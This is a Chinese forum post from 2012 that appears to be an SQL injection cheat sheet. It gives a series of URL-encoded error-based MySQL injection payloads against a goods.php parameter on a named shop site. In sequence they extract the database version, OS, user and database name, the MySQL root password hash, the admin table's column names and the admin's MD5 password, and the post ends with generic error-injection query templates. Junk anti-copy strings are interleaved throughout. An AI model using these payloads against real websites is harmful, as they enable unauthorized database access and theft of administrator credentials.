判断版本号 " I1 x! p, Q0 J. F" Y5 @
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23" w. Q9 @5 {' s, p
: D& s* O; C4 v4 L! ^
判断系统
8 s# L x* ]" V7 y" M6 L( }! u& j0 o
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%236 e/ p! A& @8 \) O" m( M4 H0 ]
0 x. u9 F) S/ @6 K
% p. X* ?1 y% o: s8 ?! Q+ ]" z
4 R. H* ]- u/ M( }* i1 e当前 user()9 ]4 n) ?' b' i. U
$ q# \% z5 E" Y1 Q+ V D9 Ahttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%238 o" m# _( S) X) h* c& r2 _& h
& Q" _$ M, S, I' O) ^# p$ _
+ y9 ?. B& {5 k1 k. G2 E
% A' q7 m; g$ G' M9 a3 @7 w当前 database()/ P+ {7 j3 u7 a/ h% a; v3 q
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
k: P4 b9 m" \9 f6 L* D" e: A% Z3 O+ `9 S1 ?
- w) A% t' M8 |2 h9 s
3 ]4 ]( L! R2 Z6 h" v& P, I
' V' O! l: D& g9 K2 d
root hash
0 j' R$ [% E! T/ n/ S6 P4 K. q, v5 j) ]) ~
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23$ m; f7 ^% m1 _* ?
) b! u9 A/ m; Z/ \9 p( E% S2 ~
: B/ V" p7 J" ^! ?+ q6 H( S
; i: f Y2 u5 J' H% e% D1 O当前 数据库表名" `! p( D4 x, J& d6 o
7 A; d M/ u8 G, |( X- }" `http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
: h+ U2 N. K! w3 D$ g6 T
1 d! P* d0 m- J6 ~, s; x
1 s% x& ]; a. \! i' d' I: j9 ]/ u, L7 O3 L0 S" y
当前 数据库 user_name 字段% T+ f" B0 O4 @- H0 x7 }8 ~6 P
6 r2 I( z" L+ @7 w4 N7 Zhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 }6 \; i( g2 R& ^, G
% V4 Z$ p# r M7 `) q+ T0 U" @当前 数据库 字段 password
4 r: v |2 h7 }* W4 W8 Yhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23$ g* v: M: \5 q5 n0 v- q5 w6 {0 {
6 V, Z* P* d7 I4 ^2 n
9 G* q8 A# L( [, W
' _; e9 ?7 i: z, `2 T获得 admin passwd(md5)
% j9 ?4 H( @% l) l5 E6 e& t1 r) t6 q
: J) Q: q) _5 a
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
3 ^: N' c$ e( e+ y f7 y- Z, c
- K( q1 \" c; |, g& E9 I$ b+ G报错注射
: U) n: l- \1 u! s! USELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
z1 a7 ^) n/ U: w' I$ I, t. S" x7 _
/ k) e" f: o8 _& S1 b% R% QSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
$ \- Y% F: \( r& X& T) F" v( @/ f( E7 N1 b" N1 ~
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) |
发表于 2012-9-5 14:59:30
收藏
支持
反对